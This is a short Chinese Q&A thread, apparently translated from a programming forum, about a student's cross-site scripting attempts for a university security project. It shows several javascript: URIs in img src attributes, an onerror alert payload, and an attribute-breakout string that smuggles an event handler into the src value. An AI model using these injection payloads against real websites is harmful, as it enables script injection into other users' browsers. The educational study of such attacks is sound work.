我必须为安全相关的大学项目进行XSS攻击。我想在其source属性中存储具有恶意代码的图像。但是,我似乎无法访问src属性中的任何javascript对象。
以下是我尝试的一些事情:
<img src="jAvascript:alert('XSS')">
抛出:未定义参考错误警报。
<img src="jAvascript:window.alert('XSS')">
抛出:未定义参考错误窗口
<img src="jAvascript:var x = new XMLHttpRequest();">
抛出:引用错误XMLHttpRequest未定义
这里有什么问题,如何访问网站的主窗口和我想要访问的对象?
修改 Onerror和所有其他事件都被过滤掉了。
答案 0 :(得分:1)
src未执行,因此无效。
解决方案是使用onerror:
<img src="wrong" onerror="alert('XSS')">
根据注入src属性的方式,您可以传递此值:
wrong" onerror="alert('XSS')
但是没有像样的框架容易受到这种攻击。